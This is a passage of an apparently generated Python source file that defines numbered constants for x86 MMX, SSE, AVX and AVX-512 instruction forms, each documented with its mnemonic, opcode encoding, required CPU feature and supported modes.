PSUBUSB_XMM_XMMM128: int = 2266
"""
``PSUBUSB xmm1, xmm2/m128``
``66 0F D8 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBUSB_XMM_XMM_XMMM128: int = 2267
"""
``VPSUBUSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D8 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBUSB_YMM_YMM_YMMM256: int = 2268
"""
``VPSUBUSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D8 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBUSB_XMM_K1Z_XMM_XMMM128: int = 2269
"""
``VPSUBUSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSB_YMM_K1Z_YMM_YMMM256: int = 2270
"""
``VPSUBUSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG D8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2271
"""
``VPSUBUSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG D8 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBUSW_MM_MMM64: int = 2272
"""
``PSUBUSW mm, mm/m64``
``NP 0F D9 /r``
``MMX``
``16/32/64-bit``
"""
PSUBUSW_XMM_XMMM128: int = 2273
"""
``PSUBUSW xmm1, xmm2/m128``
``66 0F D9 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBUSW_XMM_XMM_XMMM128: int = 2274
"""
``VPSUBUSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D9 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBUSW_YMM_YMM_YMMM256: int = 2275
"""
``VPSUBUSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D9 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBUSW_XMM_K1Z_XMM_XMMM128: int = 2276
"""
``VPSUBUSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSW_YMM_K1Z_YMM_YMMM256: int = 2277
"""
``VPSUBUSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG D9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2278
"""
``VPSUBUSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG D9 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMINUB_MM_MMM64: int = 2279
"""
``PMINUB mm1, mm2/m64``
``NP 0F DA /r``
``SSE``
``16/32/64-bit``
"""
PMINUB_XMM_XMMM128: int = 2280
"""
``PMINUB xmm1, xmm2/m128``
``66 0F DA /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMINUB_XMM_XMM_XMMM128: int = 2281
"""
``VPMINUB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DA /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINUB_YMM_YMM_YMMM256: int = 2282
"""
``VPMINUB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DA /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINUB_XMM_K1Z_XMM_XMMM128: int = 2283
"""
``VPMINUB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUB_YMM_K1Z_YMM_YMMM256: int = 2284
"""
``VPMINUB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUB_ZMM_K1Z_ZMM_ZMMM512: int = 2285
"""
``VPMINUB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DA /r``
``AVX512BW``
``16/32/64-bit``
"""
PAND_MM_MMM64: int = 2286
"""
``PAND mm, mm/m64``
``NP 0F DB /r``
``MMX``
``16/32/64-bit``
"""
PAND_XMM_XMMM128: int = 2287
"""
``PAND xmm1, xmm2/m128``
``66 0F DB /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPAND_XMM_XMM_XMMM128: int = 2288
"""
``VPAND xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DB /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPAND_YMM_YMM_YMMM256: int = 2289
"""
``VPAND ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DB /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPANDD_XMM_K1Z_XMM_XMMM128B32: int = 2290
"""
``VPANDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDD_YMM_K1Z_YMM_YMMM256B32: int = 2291
"""
``VPANDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2292
"""
``VPANDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 DB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDQ_XMM_K1Z_XMM_XMMM128B64: int = 2293
"""
``VPANDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDQ_YMM_K1Z_YMM_YMMM256B64: int = 2294
"""
``VPANDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2295
"""
``VPANDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 DB /r``
``AVX512F``
``16/32/64-bit``
"""
PADDUSB_MM_MMM64: int = 2296
"""
``PADDUSB mm, mm/m64``
``NP 0F DC /r``
``MMX``
``16/32/64-bit``
"""
PADDUSB_XMM_XMMM128: int = 2297
"""
``PADDUSB xmm1, xmm2/m128``
``66 0F DC /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDUSB_XMM_XMM_XMMM128: int = 2298
"""
``VPADDUSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DC /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDUSB_YMM_YMM_YMMM256: int = 2299
"""
``VPADDUSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DC /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDUSB_XMM_K1Z_XMM_XMMM128: int = 2300
"""
``VPADDUSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSB_YMM_K1Z_YMM_YMMM256: int = 2301
"""
``VPADDUSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2302
"""
``VPADDUSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DC /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDUSW_MM_MMM64: int = 2303
"""
``PADDUSW mm, mm/m64``
``NP 0F DD /r``
``MMX``
``16/32/64-bit``
"""
PADDUSW_XMM_XMMM128: int = 2304
"""
``PADDUSW xmm1, xmm2/m128``
``66 0F DD /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDUSW_XMM_XMM_XMMM128: int = 2305
"""
``VPADDUSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DD /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDUSW_YMM_YMM_YMMM256: int = 2306
"""
``VPADDUSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DD /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDUSW_XMM_K1Z_XMM_XMMM128: int = 2307
"""
``VPADDUSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSW_YMM_K1Z_YMM_YMMM256: int = 2308
"""
``VPADDUSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2309
"""
``VPADDUSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DD /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXUB_MM_MMM64: int = 2310
"""
``PMAXUB mm1, mm2/m64``
``NP 0F DE /r``
``SSE``
``16/32/64-bit``
"""
PMAXUB_XMM_XMMM128: int = 2311
"""
``PMAXUB xmm1, xmm2/m128``
``66 0F DE /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMAXUB_XMM_XMM_XMMM128: int = 2312
"""
``VPMAXUB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DE /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXUB_YMM_YMM_YMMM256: int = 2313
"""
``VPMAXUB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DE /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXUB_XMM_K1Z_XMM_XMMM128: int = 2314
"""
``VPMAXUB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUB_YMM_K1Z_YMM_YMMM256: int = 2315
"""
``VPMAXUB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUB_ZMM_K1Z_ZMM_ZMMM512: int = 2316
"""
``VPMAXUB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DE /r``
``AVX512BW``
``16/32/64-bit``
"""
PANDN_MM_MMM64: int = 2317
"""
``PANDN mm, mm/m64``
``NP 0F DF /r``
``MMX``
``16/32/64-bit``
"""
PANDN_XMM_XMMM128: int = 2318
"""
``PANDN xmm1, xmm2/m128``
``66 0F DF /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPANDN_XMM_XMM_XMMM128: int = 2319
"""
``VPANDN xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DF /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPANDN_YMM_YMM_YMMM256: int = 2320
"""
``VPANDN ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DF /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPANDND_XMM_K1Z_XMM_XMMM128B32: int = 2321
"""
``VPANDND xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDND_YMM_K1Z_YMM_YMMM256B32: int = 2322
"""
``VPANDND ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDND_ZMM_K1Z_ZMM_ZMMM512B32: int = 2323
"""
``VPANDND zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 DF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDNQ_XMM_K1Z_XMM_XMMM128B64: int = 2324
"""
``VPANDNQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDNQ_YMM_K1Z_YMM_YMMM256B64: int = 2325
"""
``VPANDNQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 DF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDNQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2326
"""
``VPANDNQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 DF /r``
``AVX512F``
``16/32/64-bit``
"""
PAVGB_MM_MMM64: int = 2327
"""
``PAVGB mm1, mm2/m64``
``NP 0F E0 /r``
``SSE``
``16/32/64-bit``
"""
PAVGB_XMM_XMMM128: int = 2328
"""
``PAVGB xmm1, xmm2/m128``
``66 0F E0 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPAVGB_XMM_XMM_XMMM128: int = 2329
"""
``VPAVGB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPAVGB_YMM_YMM_YMMM256: int = 2330
"""
``VPAVGB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E0 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPAVGB_XMM_K1Z_XMM_XMMM128: int = 2331
"""
``VPAVGB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E0 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGB_YMM_K1Z_YMM_YMMM256: int = 2332
"""
``VPAVGB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E0 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGB_ZMM_K1Z_ZMM_ZMMM512: int = 2333
"""
``VPAVGB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E0 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSRAW_MM_MMM64: int = 2334
"""
``PSRAW mm, mm/m64``
``NP 0F E1 /r``
``MMX``
``16/32/64-bit``
"""
PSRAW_XMM_XMMM128: int = 2335
"""
``PSRAW xmm1, xmm2/m128``
``66 0F E1 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAW_XMM_XMM_XMMM128: int = 2336
"""
``VPSRAW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E1 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAW_YMM_YMM_XMMM128: int = 2337
"""
``VPSRAW ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG E1 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAW_XMM_K1Z_XMM_XMMM128: int = 2338
"""
``VPSRAW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_YMM_K1Z_YMM_XMMM128: int = 2339
"""
``VPSRAW ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.WIG E1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_ZMM_K1Z_ZMM_XMMM128: int = 2340
"""
``VPSRAW zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.WIG E1 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSRAD_MM_MMM64: int = 2341
"""
``PSRAD mm, mm/m64``
``NP 0F E2 /r``
``MMX``
``16/32/64-bit``
"""
PSRAD_XMM_XMMM128: int = 2342
"""
``PSRAD xmm1, xmm2/m128``
``66 0F E2 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAD_XMM_XMM_XMMM128: int = 2343
"""
``VPSRAD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E2 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAD_YMM_YMM_XMMM128: int = 2344
"""
``VPSRAD ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG E2 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAD_XMM_K1Z_XMM_XMMM128: int = 2345
"""
``VPSRAD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W0 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_YMM_K1Z_YMM_XMMM128: int = 2346
"""
``VPSRAD ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W0 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_ZMM_K1Z_ZMM_XMMM128: int = 2347
"""
``VPSRAD zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W0 E2 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_XMM_K1Z_XMM_XMMM128: int = 2348
"""
``VPSRAQ xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W1 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_YMM_K1Z_YMM_XMMM128: int = 2349
"""
``VPSRAQ ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W1 E2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_ZMM_K1Z_ZMM_XMMM128: int = 2350
"""
``VPSRAQ zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W1 E2 /r``
``AVX512F``
``16/32/64-bit``
"""
PAVGW_MM_MMM64: int = 2351
"""
``PAVGW mm1, mm2/m64``
``NP 0F E3 /r``
``SSE``
``16/32/64-bit``
"""
PAVGW_XMM_XMMM128: int = 2352
"""
``PAVGW xmm1, xmm2/m128``
``66 0F E3 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPAVGW_XMM_XMM_XMMM128: int = 2353
"""
``VPAVGW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E3 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPAVGW_YMM_YMM_YMMM256: int = 2354
"""
``VPAVGW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E3 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPAVGW_XMM_K1Z_XMM_XMMM128: int = 2355
"""
``VPAVGW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E3 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGW_YMM_K1Z_YMM_YMMM256: int = 2356
"""
``VPAVGW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E3 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPAVGW_ZMM_K1Z_ZMM_ZMMM512: int = 2357
"""
``VPAVGW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E3 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMULHUW_MM_MMM64: int = 2358
"""
``PMULHUW mm1, mm2/m64``
``NP 0F E4 /r``
``SSE``
``16/32/64-bit``
"""
PMULHUW_XMM_XMMM128: int = 2359
"""
``PMULHUW xmm1, xmm2/m128``
``66 0F E4 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULHUW_XMM_XMM_XMMM128: int = 2360
"""
``VPMULHUW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E4 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULHUW_YMM_YMM_YMMM256: int = 2361
"""
``VPMULHUW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E4 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULHUW_XMM_K1Z_XMM_XMMM128: int = 2362
"""
``VPMULHUW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E4 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHUW_YMM_K1Z_YMM_YMMM256: int = 2363
"""
``VPMULHUW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E4 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHUW_ZMM_K1Z_ZMM_ZMMM512: int = 2364
"""
``VPMULHUW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E4 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMULHW_MM_MMM64: int = 2365
"""
``PMULHW mm, mm/m64``
``NP 0F E5 /r``
``MMX``
``16/32/64-bit``
"""
PMULHW_XMM_XMMM128: int = 2366
"""
``PMULHW xmm1, xmm2/m128``
``66 0F E5 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULHW_XMM_XMM_XMMM128: int = 2367
"""
``VPMULHW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E5 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULHW_YMM_YMM_YMMM256: int = 2368
"""
``VPMULHW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E5 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULHW_XMM_K1Z_XMM_XMMM128: int = 2369
"""
``VPMULHW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHW_YMM_K1Z_YMM_YMMM256: int = 2370
"""
``VPMULHW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHW_ZMM_K1Z_ZMM_ZMMM512: int = 2371
"""
``VPMULHW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E5 /r``
``AVX512BW``
``16/32/64-bit``
"""
CVTTPD2DQ_XMM_XMMM128: int = 2372
"""
``CVTTPD2DQ xmm1, xmm2/m128``
``66 0F E6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTTPD2DQ_XMM_XMMM128: int = 2373
"""
``VCVTTPD2DQ xmm1, xmm2/m128``
``VEX.128.66.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTPD2DQ_XMM_YMMM256: int = 2374
"""
``VCVTTPD2DQ xmm1, ymm2/m256``
``VEX.256.66.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTTPD2DQ_XMM_K1Z_XMMM128B64: int = 2375
"""
``VCVTTPD2DQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2DQ_XMM_K1Z_YMMM256B64: int = 2376
"""
``VCVTTPD2DQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2DQ_YMM_K1Z_ZMMM512B64_SAE: int = 2377
"""
``VCVTTPD2DQ ymm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 E6 /r``
``AVX512F``
``16/32/64-bit``
"""
CVTDQ2PD_XMM_XMMM64: int = 2378
"""
``CVTDQ2PD xmm1, xmm2/m64``
``F3 0F E6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTDQ2PD_XMM_XMMM64: int = 2379
"""
``VCVTDQ2PD xmm1, xmm2/m64``
``VEX.128.F3.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTDQ2PD_YMM_XMMM128: int = 2380
"""
``VCVTDQ2PD ymm1, xmm2/m128``
``VEX.256.F3.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PD_XMM_K1Z_XMMM64B32: int = 2381
"""
``VCVTDQ2PD xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.F3.0F.W0 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PD_YMM_K1Z_XMMM128B32: int = 2382
"""
``VCVTDQ2PD ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.F3.0F.W0 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 2383
"""
``VCVTDQ2PD zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.F3.0F.W0 E6 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PD_XMM_K1Z_XMMM128B64: int = 2384
"""
``VCVTQQ2PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F3.0F.W1 E6 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PD_YMM_K1Z_YMMM256B64: int = 2385
"""
``VCVTQQ2PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F3.0F.W1 E6 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 2386
"""
``VCVTQQ2PD zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F3.0F.W1 E6 /r``
``AVX512DQ``
``16/32/64-bit``
"""
CVTPD2DQ_XMM_XMMM128: int = 2387
"""
``CVTPD2DQ xmm1, xmm2/m128``
``F2 0F E6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPD2DQ_XMM_XMMM128: int = 2388
"""
``VCVTPD2DQ xmm1, xmm2/m128``
``VEX.128.F2.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPD2DQ_XMM_YMMM256: int = 2389
"""
``VCVTPD2DQ xmm1, ymm2/m256``
``VEX.256.F2.0F.WIG E6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPD2DQ_XMM_K1Z_XMMM128B64: int = 2390
"""
``VCVTPD2DQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F2.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2DQ_XMM_K1Z_YMMM256B64: int = 2391
"""
``VCVTPD2DQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F2.0F.W1 E6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2DQ_YMM_K1Z_ZMMM512B64_ER: int = 2392
"""
``VCVTPD2DQ ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F2.0F.W1 E6 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVNTQ_M64_MM: int = 2393
"""
``MOVNTQ m64, mm``
``NP 0F E7 /r``
``SSE``
``16/32/64-bit``
"""
MOVNTDQ_M128_XMM: int = 2394
"""
``MOVNTDQ m128, xmm1``
``66 0F E7 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVNTDQ_M128_XMM: int = 2395
"""
``VMOVNTDQ m128, xmm1``
``VEX.128.66.0F.WIG E7 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTDQ_M256_YMM: int = 2396
"""
``VMOVNTDQ m256, ymm1``
``VEX.256.66.0F.WIG E7 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVNTDQ_M128_XMM: int = 2397
"""
``VMOVNTDQ m128, xmm1``
``EVEX.128.66.0F.W0 E7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQ_M256_YMM: int = 2398
"""
``VMOVNTDQ m256, ymm1``
``EVEX.256.66.0F.W0 E7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQ_M512_ZMM: int = 2399
"""
``VMOVNTDQ m512, zmm1``
``EVEX.512.66.0F.W0 E7 /r``
``AVX512F``
``16/32/64-bit``
"""
PSUBSB_MM_MMM64: int = 2400
"""
``PSUBSB mm, mm/m64``
``NP 0F E8 /r``
``MMX``
``16/32/64-bit``
"""
PSUBSB_XMM_XMMM128: int = 2401
"""
``PSUBSB xmm1, xmm2/m128``
``66 0F E8 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBSB_XMM_XMM_XMMM128: int = 2402
"""
``VPSUBSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E8 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBSB_YMM_YMM_YMMM256: int = 2403
"""
``VPSUBSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E8 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBSB_XMM_K1Z_XMM_XMMM128: int = 2404
"""
``VPSUBSB xmm1 {k1}{z}, xmm2, xmm3/m128``
